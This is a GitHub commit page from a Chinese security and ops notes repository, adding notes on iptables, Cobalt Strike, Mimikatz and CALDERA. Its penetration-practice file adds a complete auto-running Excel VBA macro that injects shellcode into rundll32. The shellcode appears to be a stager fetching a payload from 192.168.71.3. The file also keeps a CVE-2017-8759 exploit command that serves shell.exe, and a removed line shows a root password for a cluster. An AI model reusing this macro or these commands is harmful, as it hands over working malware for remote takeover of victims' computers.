Skip to content

Commit

Permalink
Merge pull request #5 from JamesBonddu/protocol-tcp
Browse files Browse the repository at this point in the history 
Protocol tcp
  • Loading branch information
@JamesBonddu
JamesBonddu authored May 10, 2019
2 parents 36a3eca + 915af9f commit ded703c
Show file tree
Hide file tree
Showing 14 changed files with 424 additions and 35 deletions.
37 changes: 3 additions & 34 deletions 大数据/docker开发/docker.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -58,7 +58,7 @@ bash-4.4# cat /hbase/conf/hbase-site.xml
</property>
<property>
<name>hbase.zookeeper.quorum</name>
<value>10.255.175.79</value> !!!!改为宿主机IP
<value>ip</value> !!!!改为宿主机IP
</property>
<property>
<name>hbase.zookeeper.property.clientPort</name>
Expand All @@ -75,7 +75,7 @@ java.io.IOException: Could not find my address: master in list of ZooKeeper quor
#修改宿主机的/etc/hosts
10.255.175.79 master
ip master
```


Expand Down Expand Up @@ -184,21 +184,6 @@ iptables -t nat -A DOCKER -p tcp --dport 2182 -j DNAT --to-destination 172.17.0



10.255.84.89 集群

root

123///

192.168.111.145 - 150

http://10.255.84.89:8080/#/login



https://blog.csdn.net/birdben/article/details/51794427





Expand Down Expand Up @@ -229,21 +214,5 @@ https://blog.csdn.net/birdben/article/details/51794427
[kafka Doc](https://kafka.apache.org/quickstart)



TODO:

深入了解iptables

深入了解HBase

深入了解Kafka



Task:

1. HBase 数据绑定磁盘
2. Phon


[docker logs日志记录](https://www.ibm.com/developerworks/community/blogs/132cfa78-44b0-4376-85d0-d3096cd30d3f/entry/Docker_%E5%A6%82%E4%BD%95%E6%94%AF%E6%8C%81%E5%A4%9A%E7%A7%8D%E6%97%A5%E5%BF%97%E6%96%B9%E6%A1%88_%E6%AF%8F%E5%A4%A95%E5%88%86%E9%92%9F%E7%8E%A9%E8%BD%AC_Docker_%E5%AE%B9%E5%99%A8%E6%8A%80%E6%9C%AF_88?lang=en)

5 changes: 5 additions & 0 deletions 安全技能树/安全信息资源/博客资源.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
# 博客资源

参考:

[micro8](https://micro8.gitbook.io/micro8/)
57 changes: 57 additions & 0 deletions 安全技能树/安全信息资源/安全工具/CobaltStrike.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
# CobaltStrike

## 侦察 Reconnaissance
利用 System profile系统分析器发现目标系统的客户端应用程序.

## 后渗透 Post Exploitation
Beacon是CobaltStrike的有效载荷,可用来执行powershell脚本,记录键盘,截图屏幕,下载文件,生成其他有效负载等.

## 攻击包 Attack Packages

将文件转换为木马:
- Java Applet攻击
- Microsoft Office文档
- Microsoft Windows程序
- 网站克隆工具

## 隐蔽沟通 Covert Communication
信标的网络指标具有可塑性.加载C2配置文件使其看起来像另一个攻击者.使用HTTP,HTTPS,和DNS去egress a network.通过SMB协议,使用命名管道去控制信标,点对点.

## 鱼叉网络钓鱼

发送钓鱼邮件

## 浏览器透视
使用浏览器数据透视图以双因素身份验证和访问网站作为目标.

## 合作

连接到 teamserver共享数据,实时通讯以及参与过程中控制受到危害的系统.

## 报告和记录

根据红队的活动提供一个时间表和指标单,这些报告旨在使我们的同行在安全运营中收益。可以导出为PDF和MS Word.

信标的HTTP指标由Malleable C2配置文件控制.它指定如何转换数据并将其存储在事务中.转换和存储数据的相同配置文件也可以从事务中提取和恢复数据。

```sh
# 启动时指定配置文件
./teamserver [外部IP] [密码] [/path/to/my.profile]
# c2lint检查通信配置文件的语法,应用一些额外的检查甚至随机数据对配置文件进行单元测试.
./c2lint [/path/to/my.profile]

# 配置文件参考
https://github.com/rsmudge/Malleable-C2-Profiles
```

参考:

[cobaltstrike](https://www.cobaltstrike.com/)

[CobaltStrike 安装](https://blog.csdn.net/qq_36374896/article/details/83961496)

[cobaltstrike 安装破解教程](https://www.cnblogs.com/haq5201314/p/7040832.html)

[DLL Hijacking 和 COM Hijacking Bypass UAC](https://zhuanlan.zhihu.com/p/55025929)

[Malleable Command and Control](https://www.cobaltstrike.com/help-malleable-c2)
9 changes: 9 additions & 0 deletions 安全技能树/安全信息资源/安全工具/Mimikatz.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
# Mimikatz

参考:

[github Mimikatz](https://github.com/gentilkiwi/mimikatz/wiki)

[wooyun Mimikatz](https://wooyun.js.org/drops/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part3.html)

[Mimikatz 命令参考](https://paper.seebug.org/papers/Archive/drops2/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part2.html)
45 changes: 44 additions & 1 deletion 安全技能树/安全信息资源/黑客工具资源.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,49 @@ adversary emulation, 模拟攻击提供了一种用来测试网络在应对高

[攻击模拟](https://www.4hou.com/web/11241.html)

### CALDERA

CALDERA专注于后渗透阶段.它包含一个逻辑编码,用于描述该技术的要求(前置条件)和技术的效果(后置条件).
对手仿真的核心是red team,但是对手仿真不是使用攻击者的一般心态,而是采用特定现实世界对手的方法,参与的重点是让仿真团队和防御者共同努力改进系统,网络和防御过程,以更好地检测对手生命周期中使用的技术.

限制: 1.决定不模仿C2,原因是已经存在几种模拟C2网络流量的工具.通过关注仿真的其他方面产生更大的影响.
- 实用角度: CALDERA最初是为测试基于主机的防御和传感器而创建的.基于主机的防御主要使用主机上的活动而不是网络上的。
- 哲学角度: C2协议很容易改变,且由很多变化,不同的差异会很大.

```sh
git clone https://github.com/mitre/caldera.git --recursive
docker-compose up
```

默认账户密码
username: admin
password: caldera

Logic是CALDERA能够自动运行的核心部分.每一个敌手动作,称为步骤在CALDERA包含的步骤的要求和影响的逻辑描述.
CALDERA解析这些逻辑描述,以告知何时可以运行Step并预测Ste的结果.这让CALDERA通过迭代检测给定当前状态的那些步骤是可以执行的,选择步骤,然后根据逻辑规则生成该步骤的输出状态来生成[计划][planning]

[caldera](https://caldera.readthedocs.io/en/latest/)

[docker-compose install](https://docs.docker.com/compose/install/)

[caldera install](https://caldera.readthedocs.io/en/latest/installation.html)

[AI planning](https://www.isi.edu/~blythe/cs541/)


## HIDS

OSSEC分为三部分:
Manager(or Server): Agents通过1514/udp端口连接Server,agents可以通过这个端口和server沟通.
Agents


参考:

[ossec-hids github](https://github.com/ossec/ossec-hids)

[ossec doc](http://www.ossec.net/docs/index.html)

## CTF 夺旗赛

[CTF 夺旗赛资源](https://ctftime.org/)
[CTF 夺旗赛资源](https://ctftime.org/)
98 changes: 98 additions & 0 deletions 安全技能树/渗透测试/Practice/实战1.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -50,4 +50,102 @@ Final size of exe file: 7168 bytes
#监听来自ppsx文件执行之后反弹的shell。
#命令:python cve-2017-8759_toolkit.py -M exp -e http://192.168.72.3/shell.exe -l /root/8759shell.exe
```
## EXCEL 设置PAYLOAD宏病毒,
[XLSM 启用宏](https://jingyan.baidu.com/article/90895e0ff08e1864ec6b0be9.html)
```vb
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84, _
60,97,124,2,44,32,-63,-49,13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48, _
80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1,-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3, _
125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4,-117,1,-48,-119,68,36,36,91, _
91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,-24,-128,0,0,0,77,111,122,105,108,108,97,47,52,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,55,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,48,41,0,88,88,88,88,88,88,88, _
88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
88,88,88,88,88,0,89,49,-1,87,87,87,87,81,104,58,86,121,-89,-1,-43,-21,121,91,49,-55,81,81,106,3,81,81, _
104,-41,17,0,0,83,80,104,87,-119,-97,-58,-1,-43,-21,98,89,49,-46,82,104,0,2,96,-124,82,82,82,81,82,80,104, _
-21,85,46,59,-1,-43,-119,-58,49,-1,87,87,87,87,86,104,45,6,24,123,-1,-43,-123,-64,116,68,49,-1,-123,-10,116,4, _
-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104,-73,87,-32, _
11,-1,-43,-65,0,47,0,0,57,-57,116,-68,49,-1,-21,21,-21,73,-24,-103,-1,-1,-1,47,74,78,81,115,0,0,104,-16, _
-75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,83,83,-119,-25,87,104, _
0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116,-51,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,55,-1,-1,-1, _
49,57,50,46,49,54,56,46,55,49,46,51,0)
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
```
9 changes: 9 additions & 0 deletions 常用命令/系统常用命令/Linux/Linux常用命令.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,15 @@ iptables -I INPUT -p tcp -s ip --dport port -j ACCEPT
# 添加默认路由
route add -net 0.0.0.0/24 gw 192.168.18.2 em1
route del default gw 192.168.18.2 # 删除默认路由
# 删除路由规则链
iptables -F chainname

# 添加NAT规则
iptables -A nat -s 10.255.175.76 -p tcp --dport 8880 -j ACCEPT
```

[iptables](http://www.zsythink.net/archives/1199)

## 访问socket

```json
Expand All @@ -25,6 +32,8 @@ socat -d -d TCP-LISTEN:8080,fork UNIX /

[/how-to-access-unix-domain-sockets-from-the-command-line](https://stackoverflow.com/questions/27195677/how-to-access-unix-domain-sockets-from-the-command-line)

[ss和 netstat区别](https://www.cnblogs.com/kevingrace/p/6211509.html)

## curl
```sh
# curl发送json
Expand Down
55 changes: 55 additions & 0 deletions 常用命令/系统常用命令/Linux/iptables.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
# iptables

iptables其实不是真正的防火墙,可以把它看作一个客户端代理,用户通过iptables这个代理,将用户的安全设定执行到对于的安全框架(netfliter)中; 虽然使用"service iptables start启动iptables '服务' ",但其实准确的说,iptables没有一个守护进程,所以不能算真正意义上的服务,而称为内核提供的功能更佳.

(1). netfilter 位于内核空间(kernelspace),是防火墙的安全框架.
(2). iptables 是一个命令行工具,位于用户空间(userspace),它使插入、修改和除去信息包过滤表中的规则变得容易。

Netfliter的功能有:
- 网络地址转换(NAT)
- 数据包修改
- 数据包过滤

当客户端访问服务器的web服务时,客户端发送报文到网卡,而tcp/ip协议栈是属于内核的一部分,所以客户端的信息会通过内核的TCp协议传输到用户空间中的web服务中,而此时,客户端报文的目标终点是web服务器监听的套接字(IP:port).

当web服务器响应客户端请求时,发出响应报文的(IP:port)则成为了客户端,再经过内核空间流经网卡发出请求.

位于内核空间的Netfliter,所有报文的进出都要通过这些"关卡",而这些关卡在iptables称为"链".`5链4表`

![iptables-chains](../images/iptables-chains.png)

## 规则、表和链

1. 规则(rules)

规则(rules)其实就是网络管理员预定义的条件,规则一般的定义为“如果数据包头符合这样的条件,就这样处理这个数据包”。规则存储在内核空间的信息包过滤表中,这些规则分别指定了源地址、目的地址、传输协议(如TCP、UDP、ICMP)和服务类型(如HTTP、FTP和SMTP)等。当数据包与规则匹配时,iptables就根据规则所定义的方法来处理这些数据包,如放行(accept)、拒绝(reject)和丢弃(drop)等。配置防火墙的主要工作就是添加、修改和删除这些规则。
2. 链(chains)

链(chains)是数据包传播的路径,每一条链其实就是众多规则中的一个检查清单,每一条链中可以有一条或数条规则。当一个数据包到达一个链时,iptables就会从链中第一条规则开始检查,看该数据包是否满足规则所定义的条件。如果满足,系统就会根据该条规则所定义的方法处理该数据包;否则iptables将继续检查下一条规则,如果该数据包不符合链中任一条规则,iptables就会根据该链预先定义的默认策略来处理数据包。

3. 表(tables)

表(tables)提供特定的功能,iptables内置了4个表,即raw表、filter表、nat表和mangle表,分别用于实现包过滤,网络地址转换和包重构的功能。

![iptables-table](../images/iptables-table.jpg)

> RAW 表; iptable_raw 关闭nat表上启用的连接追踪机制
只使用在PREROUTING链和OUTPUT链上,因为优先级最高,从而可以对收到的数据包在连接跟踪前进行处理。一但用户使用了RAW表,在 某个链上,RAW表处理完后,将跳过NAT表和 ip_conntrack处理,即不再做地址转换和数据包的链接跟踪处理了

> filter 表; iptables_filter 负责过滤功能
主要用于过滤数据包,该表根据系统管理员预定义的一组规则过滤符合条件的数据包。对于防火墙而言,主要利用在filter表中指定的规则来实现对数据包的过滤。Filter表是默认的表,如果没有指定哪个表,iptables 就默认使用filter表来执行所有命令,filter表包含了INPUT链(处理进入的数据包),RORWARD链(处理转发的数据包),OUTPUT链(处理本地生成的数据包)在filter表中只能允许对数据包进行接受,丢弃的操作,而无法对数据包进行更改

> NAT;iptable_nat 网络地址转换(network address translation)
NAT(NetWork Address Translation)
SNAT: (POSTROUTING,修改即将出去的包.修改的是来源IP,故称为Source NAt,SNAT)
DNAt: (PREROUTING,修改得到是即将到来的数据包.修改的是目的IP,故称为Destination NAt,DNAT)

> mangle表; iptable_mangle 拆解报文,做出修改并重新封装.
参考:

[iptables详解](https://blog.csdn.net/reyleon/article/details/12976341)

[iptables 分析](http://www.zsythink.net/archives/1199)
Binary file added 常用命令/系统常用命令/images/iptables-chains.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 常用命令/系统常用命令/images/iptables-table.jpg
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading

0 comments on commit ded703c

Please sign in to comment.